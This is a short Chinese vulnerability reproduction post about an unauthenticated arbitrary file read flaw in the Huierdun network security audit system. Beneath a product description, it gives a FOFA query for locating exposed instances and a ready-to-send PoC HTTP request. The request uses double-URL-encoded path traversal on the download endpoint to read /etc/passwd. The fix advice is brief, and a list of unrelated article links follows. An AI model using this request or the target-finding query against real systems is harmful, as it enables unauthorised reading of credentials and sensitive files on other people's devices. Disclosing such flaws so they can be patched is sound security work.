惠尔顿 网络安全审计系统 任意文件读取漏洞复现

0x01 产品简介

惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能;增强的应用安全扩展;强大的应用协议分析与报表功能。

0x02 漏洞概述

惠尔顿 网络安全审计系统download接口存在任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证,使系统处于极不安全的状态。

0x03 影响范围

version <= v10

0x04 复现环境

FOFA:app="惠尔顿-网络安全审计系统"

0x05 漏洞复现

PoC

复制代码
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

读取 /etc/passwd 文件

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
AI创界者4 分钟前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
@insist1239 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
IT小白杨10 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
humors22111 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记11 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
爱折腾的小黑牛14 小时前
礼账小程序的数据安全方案:加密与备份
数据库·安全
云水一下17 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
humors22117 小时前
【转帖】安全企业发布iOS漏洞攻击风险检测工具
安全·ios·手机·苹果
糖果店的幽灵17 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
Joker时代18 小时前
重塑Web3安全防线:Vkey验证器正式登陆安卓与iOS平台,开启数字资产防护新纪元
安全·web3